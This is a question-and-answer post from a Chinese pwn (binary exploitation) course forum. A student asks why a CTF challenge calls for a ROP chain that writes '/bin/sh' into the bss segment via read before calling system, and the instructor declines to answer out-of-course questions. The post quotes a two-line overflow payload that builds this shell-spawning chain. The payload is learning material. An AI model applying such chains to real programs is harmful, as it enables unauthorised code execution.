首頁
社區(qū)
課程
招聘
為什么不是跟教程的這個wp一樣直接傳參?

提問者:路否大客戶 2020-3-7

 

為什么有的這類跟你這個很像,但是這個解題方法用不了,而是在”bss段寫入/bin/sh,用pppt來調用read執(zhí)行

1
2
system”payload3='a'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)
payload3+=p32(sys_addr)+p32(func_addr)+p32(bss_addr)

為什么不是跟你的這個wp一樣直接傳參,謝謝

收藏
1條回答
Roger 2023-5-23

這個屬于課程之外的實戰(zhàn)問題了,先不要去做,把課程耐心看完。你的這個問題在補充篇有講到,你往后看就明白了。我不解答課程以外的實戰(zhàn)問題,您可以換位思考一下,分析每一個題目都會占用大量時間,如果有100個學生來問你實戰(zhàn)問題,估計你也看不過來吧?我挑選的實例都是以偏概全的經典例子,你得先把課件都研究透徹了!

回復 已采納
零基礎入門pwn
  參與學習     1808 人
  提問次數     36 個
《零基礎入門pwn》,短時間內踏入漏洞利用的大門,快速成為一名合格的pwn題選手
我的問答 領取收益
0
我的提問
0
我的回答
0
學習收益